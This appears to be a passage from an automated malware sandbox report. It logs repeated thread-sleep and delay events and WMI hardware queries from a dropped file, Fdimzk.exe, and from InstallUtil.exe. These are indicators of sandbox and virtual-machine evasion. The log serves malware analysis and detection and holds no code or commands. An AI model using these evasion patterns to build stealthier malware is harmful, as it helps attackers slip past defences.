                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -94094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 3272Thread sleep time: -93984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 6824Thread sleep count: 4288 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 6824Thread sleep count: 5484 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99624s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99185s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -99078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98963s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98856s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98308s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98200s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -98094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97982s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97871s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97764s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97651s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97534s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97269s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -97028s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96683s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96555s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96342s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -96119s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95989s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95422s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95202s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -95093s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -94904s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -94679s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe TID: 4136Thread sleep time: -94432s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep count: 41 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -37815825351104557s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3956Thread sleep count: 2895 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3956Thread sleep count: 6937 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99433s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -99316s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98983s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98730s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98605s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98499s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98391s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98275s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -98047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -97110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -96110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -95094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -94110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1076Thread sleep time: -93985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep count: 32 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -29514790517935264s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3436Thread sleep count: 2089 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3436Thread sleep count: 7769 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99218s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -99000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -98015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97561s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -97015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96900s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -96015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -95015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -94906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -94797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -1799907s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1776Thread sleep time: -1799782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99780Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99561Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99233Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99014Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98905Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98795Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98686Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98522Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98353Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98052Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97592Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97374Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96924Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96139Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95877Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95604Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95259Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94982Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94764Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94217Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93888Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeThread delayed: delay time: 99125Jump to behavior
